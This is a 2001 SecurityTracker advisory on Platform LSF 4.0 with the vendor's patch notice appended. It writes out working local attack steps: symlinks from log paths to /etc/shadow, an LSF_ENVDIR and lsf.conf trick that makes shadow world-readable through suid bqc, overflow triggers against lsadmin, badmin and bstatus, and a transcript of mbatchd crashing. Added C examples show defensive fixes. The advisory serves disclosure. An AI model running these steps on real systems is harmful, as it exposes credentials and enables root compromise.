SecurityTracker.com
Category:   Application (Generic)  >   Platform LSF
Vendors:   Platform Computing Inc.
(Vendor Issues Patch) Re: Platform Computing's Platform LSF Load Sharing Application Contains Multiple Flaws, Disclosing Files to Local Users, Giving Local Users Root Access, and Crashing When Remote Users Send Malformed Packets
SecurityTracker Alert ID:  1002966
SecurityTracker URL:  http://securitytracker.com/id/1002966
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Dec 13 2001
Impact:   Denial of service via network, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via local system, Modification of system information, Modification of user information, Root access via local system
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 4.0
Description:   Several vulnerabilities have been reported in Platform Computing's Platform LSF load sharing facility software. These flaws include buffer overflows and unsafe use of temporary files.

A local user can read any file on the system in the default configuration because LSF does not check for existing files or symlinks when writing to its log files. A local user can create a symlink in the /tmp directory, using a log file name, that points to another file. When LSF starts, it appends its log entries to the symlinked file and changes that file's permissions to allow global read access.

An example symlink to allow all local users to read the /etc/shadow file is:

ln -s /etc/shadow /tmp/lim.log.hostname

Local users can also read any file on the system using another method. Because a user is given their own configuration file, the user can force some LSF applications to do unexpected things. The following example shows how a symlink attack can be combined with configuration file modifications to allow a local user to read any file on the system (/etc/shadow in this example):

Change the LSF_ENVDIR so it will point to your home directory:
% setenv LSF_ENVDIR /my/home/dir

Copy LSF configuration file to your home directory:
% cp /etc/lsf.conf /my/home/dir/lsf.conf

Make the following changes in /my/home/dir/lsf.conf:
LSB_CMD_LOGDIR=/tmp/test
LSF_LOGDIR=/tmp/test

Make a /tmp/test directory:
% mkdir /tmp/test

Create a symlink from the LSF log file to /etc/shadow:
% ln -s /etc/shadow /tmp/test/bqc.log.hostname
[ 'hostname' is your hostname ]

At this point, the user must force an LSF application that has set user id (suid) root privileges to write an entry to the log file bqc.log.hostname. 'bqc' is an appropriate application to do this and can be asked for information on a non-existent queue (dupa_zbita):

% bqc -i dupa_zbita

This will cause 'bqc' to write to its log file. Because of the user's own configuration file (/my/home/dir/lsf.conf) and the symlink, the log entry will be written to /etc/shadow and the permissions of /etc/shadow will be changed to world readable permissions.
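
The defensive counterpart to both log-file symlink cases above, as an added example (not vendor code and not part of the original advisory): a log opener that refuses a symlink at the log path and sets permissions on the descriptor rather than the name. The function names, the temporary directory and the stand-in "secret" file are constructed for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open a log for appending; refuse a symlink at the final path component.
 * Returns a file descriptor, or -1 if the path is not safe to write to. */
int open_log_safely(const char *path)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;                      /* ELOOP if path is a symlink */
    /* Validate the object actually opened, not the name. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != geteuid() || st.st_nlink != 1 ||
        fchmod(fd, 0600) != 0) {        /* fd-based, never chmod(path) */
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed scenario in a private temp dir: "secret" stands in for a
 * protected file. Returns 1 if the planted link is refused, the secret's
 * mode is unchanged, and a fresh log name is still accepted. */
int demo_symlink_refused(void)
{
    char dir[] = "/tmp/lsfdemoXXXXXX", secret[PATH_MAX], lnk[PATH_MAX], fresh[PATH_MAX];
    struct stat before, after;
    if (!mkdtemp(dir)) return -1;
    snprintf(secret, sizeof secret, "%s/secret", dir);
    snprintf(lnk, sizeof lnk, "%s/bqc.log.hostname", dir);
    snprintf(fresh, sizeof fresh, "%s/lim.log.hostname", dir);
    int s = open(secret, O_WRONLY | O_CREAT, 0600);
    if (s < 0 || symlink(secret, lnk) != 0 || stat(secret, &before) != 0) return -1;
    close(s);
    int bad = open_log_safely(lnk), good = open_log_safely(fresh);
    stat(secret, &after);
    int ok = bad == -1 && good >= 0 && before.st_mode == after.st_mode && after.st_size == 0;
    if (good >= 0) close(good);
    unlink(lnk); unlink(fresh); unlink(secret); rmdir(dir);
    return ok;
}

int main(void) { printf("symlink refused: %d\n", demo_symlink_refused()); return 0; }
```

O_NOFOLLOW only guards the last path component, so the log directory itself should be owned by the daemon's account and not writable by other users.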

It is reported that the 'lsadmin' and 'badmin' executables contain several exploitable buffer overflows that allow a local user to execute arbitrary code with root level privileges (as those executables have suid root permissions). The buffer overflow can be demonstrated with the following commands, which will cause a segmentation fault:

% setenv LSF_ENVDIR `perl -e 'print "A" x 292'`
% lsadmin [or badmin]

It is reported that there are other buffer overflow vulnerabilities in other executables.
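
One way a setuid tool can handle LSF_ENVDIR so that neither the user-supplied configuration directory nor an oversized value causes harm, as an added example (not vendor code and not the contents of the vendor patch). The function name, the 256-byte buffer and the "/etc" default (taken from the /etc/lsf.conf path shown above) are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define DEFAULT_ENVDIR "/etc"   /* assumption: the page copies /etc/lsf.conf */
#define CONF_PATH_MAX 256       /* constructed size for this example */

/* Build the path of lsf.conf for a tool that may be installed setuid root.
 * env_value  raw LSF_ENVDIR (may be NULL, oversized, or user-chosen)
 * privileged nonzero when real and effective uid differ
 * Returns 0 and fills out, or -1 if the result would not fit. */
int lsf_conf_path(const char *env_value, int privileged, char *out, size_t outlen)
{
    const char *dir = DEFAULT_ENVDIR;
    /* A setuid binary must not let its caller choose the config directory. */
    if (!privileged && env_value != NULL) {
        size_t n = strnlen(env_value, outlen);   /* never scans past outlen */
        if (env_value[0] == '/' && n < outlen)
            dir = env_value;
    }
    /* snprintf never writes past outlen; report truncation as an error. */
    int w = snprintf(out, outlen, "%s/lsf.conf", dir);
    return (w < 0 || (size_t)w >= outlen) ? -1 : 0;
}

int main(void)
{
    char path[CONF_PATH_MAX];
    int privileged = getuid() != geteuid();
    if (lsf_conf_path(getenv("LSF_ENVDIR"), privileged, path, sizeof path) != 0) {
        fputs("configuration path too long\n", stderr);
        return 1;
    }
    printf("reading %s\n", path);
    return 0;
}
```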

A remote user can reportedly exploit a buffer overflow in the 'mbatchd' daemon to cause it to crash by sending specially crafted packets to the daemon. A demonstration exploit transcript is provided:

% bstatus -d AAA -J `perl -e 'print "A" x 500'`
Job <0>: XDR encode/decode error
% bjobs
batch system daemon not responding ... still trying

% tail -2 sbatchd.log.hostname
17:18:37 2001 87317 3 4.0.1 mbatchd died with signal <11> termination
17:18:37 2001 87317 3 4.0.1 mbatchd core dumped

[Editor's note: The author indicates that it may be possible to execute arbitrary code via this method, but that possibility is not explored in the author's report.]

The vendor has reportedly been notified.

Impact:   A local user can read any file on the system and can execute arbitrary code on the system with root level privileges. A remote user can cause the mbatchd daemon to crash.
Solution:   The vendor has released a patch, which is available at ftp.platform.com or by contacting Technical Support (support@platform.com).

The patch is currently available for LSF 4.2 on all major platforms. Patches for other platforms and versions of LSF will be made available as required.

The vendor notes that many of the issues raised in the original report were configuration issues that did not require a patch.

Vendor URL:  www.platform.com/products/wm/LSF/index.asp
Cause:   Access control error, Boundary error, State error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry is a follow-up to the message listed below.
Dec 5 2001 Platform Computing's Platform LSF Load Sharing Application Contains Multiple Flaws, Disclosing Files to Local Users, Giving Local Users Root Access, and Crashing When Remote Users Send Malformed Packets



 Source Message Contents

Subject:  PATCH: Vulnerabilities in LSF



In-Reply-To: <Pine.LNX.4.10.10112051714250.19966-100000@apollo.aci.com.pl>

LSF users,

We now have a patch that addresses the issues raised by the security posting
of 5 December 2001.  It is available to our customers from ftp.platform.com or 
by contacting Technical Support (support@platform.com).

The patch is currently available for LSF 4.2 on all major platforms. Patches for
other platforms and versions of LSF will be made available as required.

We would also like to point out again that many of the security issues raised can be
addressed in all versions of LSF with configuration changes.  We invite you to contact
Platform Technical Support to discuss your configurations and any security concerns
that you may have.

There is also an ongoing development effort to review the security issues. We 
will continue to keep you posted about our status and any actions that are taken.
We continue to work directly with the original reporter. 

As always, your comments and feedback are welcome.

take care,

Greg

Greg L. Reid                                                          greid@platform.com
Second-line Technical Support Manager
Platform Computing Corporation
3760 14th Avenue, Markham                                Phone:(905)948-4207
Ontario, Canada, L3R 3T7                                   Cell :(416)788-4487


Platform Technical Support
--------------------------
Email: support@platform.com
Phone: (905)948-4297
Toll Free: 1-877-444-4573 

 
 

